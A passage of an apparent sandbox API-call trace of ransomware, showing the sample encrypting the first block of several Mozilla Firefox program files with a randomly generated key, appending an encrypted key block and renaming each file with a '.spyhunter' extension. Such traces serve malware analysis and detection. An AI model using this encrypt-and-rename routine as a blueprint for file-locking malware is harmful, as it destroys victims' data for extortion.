0x2c39fe0 [0162.686] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e724, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e724*=0x89, lpOverlapped=0x0) returned 1 [0162.690] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.690] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x89, lpNumberOfBytesWritten=0x248e724, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e724*=0x89, lpOverlapped=0x0) returned 1 [0162.690] GetProcessHeap () returned 0x2c0000 [0162.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.690] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.690] WriteFile (in: hFile=0x9c, lpBuffer=0x248e764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e724, lpOverlapped=0x0 | out: lpBuffer=0x248e764*, lpNumberOfBytesWritten=0x248e724*=0x4, lpOverlapped=0x0) returned 1 [0162.690] WriteFile (in: hFile=0x9c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e724, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e724*=0x30, lpOverlapped=0x0) returned 1 [0162.691] CloseHandle (hObject=0x9c) returned 1 [0162.691] GetProcessHeap () returned 0x2c0000 [0162.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0162.691] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.spyhunter") returned 72 [0162.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini.spyhunter")) returned 1 [0162.692] GetProcessHeap () returned 0x2c0000 [0162.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0162.692] GetProcessHeap () returned 0x2c0000 [0162.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.692] GetProcessHeap () returned 0x2c0000 [0162.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5d30 | out: hHeap=0x2c0000) returned 1 [0162.692] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e760 | out: pbBuffer=0x248e760) returned 1 [0162.692] GetProcessHeap () returned 0x2c0000 [0162.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.692] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e758*=0x30) returned 1 [0162.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.720] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log") returned 66 [0162.720] StrStrW (lpFirst="uninstall.log", lpSrch=".txt") returned 0x0 [0162.720] GetProcessHeap () returned 0x2c0000 [0162.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.721] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e71c*=0x794, lpOverlapped=0x0) returned 1 [0162.747] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff86c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.747] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x794, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e71c*=0x794, lpOverlapped=0x0) returned 1 [0162.747] GetProcessHeap () returned 0x2c0000 [0162.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0162.747] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.747] WriteFile (in: hFile=0xa0, lpBuffer=0x248e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x248e75c*, lpNumberOfBytesWritten=0x248e71c*=0x4, lpOverlapped=0x0) returned 1 [0162.748] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e71c*=0x30, lpOverlapped=0x0) returned 1 [0162.748] CloseHandle (hObject=0xa0) returned 1 [0162.748] GetProcessHeap () returned 0x2c0000 [0162.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.748] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log.spyhunter") returned 76 [0162.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\uninstall.log.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\uninstall.log.spyhunter")) returned 1 [0162.750] GetProcessHeap () returned 0x2c0000 [0162.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.750] GetProcessHeap () returned 0x2c0000 [0162.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.750] GetProcessHeap () returned 0x2c0000 [0162.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e069a8 | out: hHeap=0x2c0000) returned 1 [0162.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e760 | out: pbBuffer=0x248e760) returned 1 [0162.750] GetProcessHeap () returned 0x2c0000 [0162.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e758*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e758*=0x30) returned 1 [0162.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.751] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk") returned 55 [0162.751] StrStrW (lpFirst="softokn3.chk", lpSrch=".txt") returned 0x0 [0162.751] GetProcessHeap () returned 0x2c0000 [0162.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.751] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e71c*=0x383, lpOverlapped=0x0) returned 1 [0162.753] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.753] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e71c*=0x383, lpOverlapped=0x0) returned 1 [0162.753] GetProcessHeap () returned 0x2c0000 [0162.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0162.753] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.753] WriteFile (in: hFile=0xa0, lpBuffer=0x248e75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x248e75c*, lpNumberOfBytesWritten=0x248e71c*=0x4, lpOverlapped=0x0) returned 1 [0162.753] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e71c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e71c*=0x30, lpOverlapped=0x0) returned 1 [0162.753] CloseHandle (hObject=0xa0) returned 1 [0162.753] GetProcessHeap () returned 0x2c0000 [0162.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.754] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.spyhunter") returned 65 [0162.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk.spyhunter")) returned 1 [0162.755] GetProcessHeap () returned 0x2c0000 [0162.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.755] GetProcessHeap () returned 0x2c0000 [0162.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.755] GetProcessHeap () returned 0x2c0000 [0162.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1590 | out: hHeap=0x2c0000) returned 1 [0162.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e758 | out: pbBuffer=0x248e758) returned 1 [0162.755] GetProcessHeap () returned 0x2c0000 [0162.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e750*=0x30) returned 1 [0162.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.756] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\removed-files") returned 56 [0162.756] StrStrW (lpFirst="removed-files", lpSrch=".txt") returned 0x0 [0162.756] GetProcessHeap () returned 0x2c0000 [0162.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.756] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e714*=0x2800, lpOverlapped=0x0) returned 1 [0162.759] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.760] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e714*=0x2800, lpOverlapped=0x0) returned 1 [0162.760] GetProcessHeap () returned 0x2c0000 [0162.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0162.760] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.760] WriteFile (in: hFile=0xa0, lpBuffer=0x248e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x248e754*, lpNumberOfBytesWritten=0x248e714*=0x4, lpOverlapped=0x0) returned 1 [0162.760] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e714*=0x30, lpOverlapped=0x0) returned 1 [0162.760] CloseHandle (hObject=0xa0) returned 1 [0162.760] GetProcessHeap () returned 0x2c0000 [0162.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.760] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.spyhunter") returned 66 [0162.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files.spyhunter")) returned 1 [0162.761] GetProcessHeap () returned 0x2c0000 [0162.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.761] GetProcessHeap () returned 0x2c0000 [0162.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.761] GetProcessHeap () returned 0x2c0000 [0162.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea86f8 | out: hHeap=0x2c0000) returned 1 [0162.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e758 | out: pbBuffer=0x248e758) returned 1 [0162.762] GetProcessHeap () returned 0x2c0000 [0162.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e750*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e750*=0x30) returned 1 [0162.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.763] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\precomplete") returned 54 [0162.763] StrStrW (lpFirst="precomplete", lpSrch=".txt") returned 0x0 [0162.763] GetProcessHeap () returned 0x2c0000 [0162.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.763] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e714*=0x7e3, lpOverlapped=0x0) returned 1 [0162.764] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff81d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.764] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7e3, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e714*=0x7e3, lpOverlapped=0x0) returned 1 [0162.764] GetProcessHeap () returned 0x2c0000 [0162.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0162.766] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.766] WriteFile (in: hFile=0xa0, lpBuffer=0x248e754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x248e754*, lpNumberOfBytesWritten=0x248e714*=0x4, lpOverlapped=0x0) returned 1 [0162.766] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e714, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e714*=0x30, lpOverlapped=0x0) returned 1 [0162.766] CloseHandle (hObject=0xa0) returned 1 [0162.767] GetProcessHeap () returned 0x2c0000 [0162.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.767] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.spyhunter") returned 64 [0162.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\precomplete" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\precomplete.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\precomplete.spyhunter")) returned 1 [0162.768] GetProcessHeap () returned 0x2c0000 [0162.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.768] GetProcessHeap () returned 0x2c0000 [0162.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.768] GetProcessHeap () returned 0x2c0000 [0162.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec14d8 | out: hHeap=0x2c0000) returned 1 [0162.768] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e750 | out: pbBuffer=0x248e750) returned 1 [0162.768] GetProcessHeap () returned 0x2c0000 [0162.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.768] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e748*=0x30) returned 1 [0162.768] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.770] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe") returned 61 [0162.770] StrStrW (lpFirst="plugin-hang-ui.exe", lpSrch=".txt") returned 0x0 [0162.770] GetProcessHeap () returned 0x2c0000 [0162.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0162.770] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e70c*=0x2800, lpOverlapped=0x0) returned 1 [0162.918] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.918] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e70c*=0x2800, lpOverlapped=0x0) returned 1 [0162.918] GetProcessHeap () returned 0x2c0000 [0162.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0162.918] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.918] WriteFile (in: hFile=0xa0, lpBuffer=0x248e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x248e74c*, lpNumberOfBytesWritten=0x248e70c*=0x4, lpOverlapped=0x0) returned 1 [0162.941] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e70c*=0x30, lpOverlapped=0x0) returned 1 [0162.942] CloseHandle (hObject=0xa0) returned 1 [0162.942] GetProcessHeap () returned 0x2c0000 [0162.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.942] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe.spyhunter") returned 71 [0162.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe.spyhunter")) returned 1 [0162.942] GetProcessHeap () returned 0x2c0000 [0162.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0162.943] GetProcessHeap () returned 0x2c0000 [0162.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0162.943] GetProcessHeap () returned 0x2c0000 [0162.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5ba0 | out: hHeap=0x2c0000) returned 1 [0162.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e750 | out: pbBuffer=0x248e750) returned 1 [0162.943] GetProcessHeap () returned 0x2c0000 [0162.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e748*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e748*=0x30) returned 1 [0162.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.943] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk") returned 54 [0162.943] StrStrW (lpFirst="nssdbm3.chk", lpSrch=".txt") returned 0x0 [0162.943] GetProcessHeap () returned 0x2c0000 [0162.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0162.943] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e70c*=0x383, lpOverlapped=0x0) returned 1 [0162.945] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.945] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e70c*=0x383, lpOverlapped=0x0) returned 1 [0162.945] GetProcessHeap () returned 0x2c0000 [0162.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0162.945] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.945] WriteFile (in: hFile=0xa0, lpBuffer=0x248e74c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x248e74c*, lpNumberOfBytesWritten=0x248e70c*=0x4, lpOverlapped=0x0) returned 1 [0162.945] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e70c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248e70c*=0x30, lpOverlapped=0x0) returned 1 [0162.945] CloseHandle (hObject=0xa0) returned 1 [0162.945] GetProcessHeap () returned 0x2c0000 [0162.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0162.945] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.spyhunter") returned 64 [0162.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk.spyhunter")) returned 1 [0163.050] GetProcessHeap () returned 0x2c0000 [0163.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0163.050] GetProcessHeap () returned 0x2c0000 [0163.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0163.050] GetProcessHeap () returned 0x2c0000 [0163.050] HeapFree (in: hHeap=0x2c0000, 